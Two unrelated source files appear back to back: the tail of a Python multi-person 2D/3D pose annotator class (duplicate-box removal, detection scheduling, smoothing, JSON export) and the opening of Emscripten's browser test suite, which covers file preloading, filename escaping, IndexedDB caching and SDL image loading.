person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_HIP]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.R_KNEE]
person_confidence += curr_persons[pid]['confidence'][PoseConfig.L_KNEE]
person_confidence /= 11
# if confidence is too low : remove the person from the annotator
if person_confidence < 0.25:
pid_to_remove.add(curr_persons[pid]['id'])
# remove persons sharing the same location on the screen
# (avoid detecting the same person twice when tricky situations happen)
for other_pid in range(pid+1, len(curr_persons)):
bbox1 = curr_persons[pid]['bbox']
bbox2 = curr_persons[other_pid]['bbox']
bbox_inter = bbox1.intersect(bbox2)
# is intersection empty
if bbox_inter is None:
continue
ratio1 = bbox_inter.get_width() * bbox_inter.get_height()
ratio1 /= bbox1.get_width() * bbox1.get_height()
ratio2 = bbox_inter.get_width() * bbox_inter.get_height()
ratio2 /= bbox2.get_width() * bbox2.get_height()
ratio = max(ratio1, ratio2)
# if the intersection covers more than 85% of either box, treat them as duplicates => remove other_pid
if ratio > 0.85:
pid_to_remove.add(curr_persons[other_pid]['id'])
# update the local version of persons
curr_persons = [curr_persons[pid] for pid in range(len(curr_persons)) if curr_persons[pid]['id'] not in pid_to_remove]
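# run the object detector only when an image is available, a person slot is free,
# and the extra detection delay has elapsed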
is_requiring_inference = self.last_image is not None
is_requiring_inference = is_requiring_inference and len(self.available_person_id) > 0
tmp = time.time() - self.last_object_detector_timestamp > AnnotatorInterface.EXTRA_OBJECT_DETECTION_DELAY
is_requiring_inference = is_requiring_inference and tmp
# add new incoming people [person_to_add]
if is_requiring_inference:
curr_bboxes = [p['bbox'] for p in curr_persons]
new_bboxes, confidences = self.bbox_model.predict(self.last_image)
# simple matching from old bboxes to new ones:
# returns matches, unmatched from arg1, unmatched from arg2
match_ids, unmatched_curr_ids, unmatched_new_ids = IdentityTracker.match_bboxes(curr_bboxes, new_bboxes)
# add the most confident new persons as long as allocations are available for them
total_available_allocations = len(pid_to_remove) + len(self.available_person_id)
tmp = [ [new_bboxes[i], confidences[i]] for i in unmatched_new_ids]
tmp.sort(key=lambda x:x[1], reverse=True)
for box in [box_and_conf[0] for box_and_conf in tmp][:total_available_allocations]:
detected_boxes_to_add.add(box)
self.last_object_detector_timestamp = time.time()
with self.persons_lock:
# update removed persons
for pid in pid_to_remove:
del self.persons[pid]
self.available_person_id.add(pid)
for box in detected_boxes_to_add:
p = self._new_person(self.available_person_id.pop())
p['bbox'] = box
self.persons[p['id']] = p
""" Terminates the object detection routine executed in background"""
def terminate(self):
self.object_detector_kill_trigger = True
"""
Return the persons' annotations
"""
def get_persons(self):
with self.persons_lock:
persons = copy.deepcopy(self.persons)
return [p for p in persons.values() if p['pose_2d'] is not None]
"""
Update the pose with the given image and return the new annotation
"""
def update(self, image):
if len(image.shape) != 3:
raise Exception("image need to be shaped as hxwx3 or hxwx4 for png")
# remove alpha channel if any
if image.shape[2] == 4:
image = image[:,:,:3]
# if there is at least one person to detect
if len(self.persons) > 0:
# update curr persons annotations in local
with self.persons_lock:
curr_persons = copy.deepcopy(self.persons)
pids, bboxes, poses_2d = [], [], []
for p in curr_persons.values():
pids.append(p['id'])
bboxes.append(p['bbox'])
poses_2d.append(p['pose_2d'])
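# estimate the 2D poses on the current image, then lift them to 3D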
new_poses_2d, confidences = self.pose_2d_model.predict(image, bboxes, poses_2d)
confidences = np.array(confidences)
new_poses_3d = self.pose_3d_model.predict(new_poses_2d)
for i,pid in enumerate(pids):
curr_persons[pid]['bbox'] = new_poses_2d[i].to_bbox()
curr_persons[pid]['pose_2d'] = new_poses_2d[i]
curr_persons[pid]['pose_3d'] = new_poses_3d[i]
curr_persons[pid]['confidence'] = confidences[i]
# update the annotations in the scope of the class
with self.persons_lock:
for curr_person in curr_persons.values():
# a person['id'] could have been removed and a new person added with the same label
is_same_person = curr_person['id'] in self.persons and self.persons[curr_person['id']]['hash'] == curr_person['hash']
# if possible add a bit of smoothing between predictions
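# exponential smoothing: 85% weight on the new prediction, 15% on the previous one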
if is_same_person and self.persons[curr_person['id']]['pose_2d'] is not None:
smoothed_joints_2d = 0.85 * curr_person['pose_2d'].get_joints() \
+ 0.15 * self.persons[curr_person['id']]['pose_2d'].get_joints()
# note 2d joints are smoothed twice (todo)
smoothed_joints_3d = 0.85 * curr_person['pose_3d'].get_joints() \
+ 0.15 * self.persons[curr_person['id']]['pose_3d'].get_joints()
smoothed_confidence = 0.85 * curr_person['confidence'] + 0.15 * self.persons[curr_person['id']]['confidence']
curr_person['pose_2d'] = Pose2D(smoothed_joints_2d)
curr_person['pose_3d'] = Pose3D(smoothed_joints_3d)
curr_person['confidence'] = smoothed_confidence
curr_person['bbox'] = curr_person['pose_2d'].to_bbox()
# do not update a person removed in the meantime by the threaded routine
if is_same_person:
self.persons[curr_person['id']] = curr_person
self.last_image = image
return self.get_persons()
"""
Return a json containing the annotations
"""
def jsonify(self):
persons = self.get_persons()
annotations = []
for i in range(len(persons)):
joints2d = persons[i]['pose_2d'].get_joints()
joints3d = persons[i]['pose_3d'].get_joints()
annot = {'id':persons[i]['id'], 'pose_2d': {}, 'pose_3d': {}, 'confidence':persons[i]['confidence'].tolist()}
# use a distinct index for the joints so the person index 'i' is not shadowed
for joint_id in range(PoseConfig.get_total_joints()):
joint2d = {'x': float(joints2d[joint_id][0]), 'y': float(joints2d[joint_id][1])}
annot['pose_2d'][PoseConfig.NAMES[joint_id]] = joint2d
joint3d = {'x': float(joints3d[joint_id][0]), 'y': float(joints3d[joint_id][1]), 'z': float(joints3d[joint_id][2])}
annot['pose_3d'][PoseConfig.NAMES[joint_id]] = joint3d
annotations.append(annot)
return json.dumps(annotations, ensure_ascii=False)
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
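# parse the 'Range: bytes=start-end' header and serve only the requested slice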
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, they are handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test: a missing file should make xhr.onload run with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
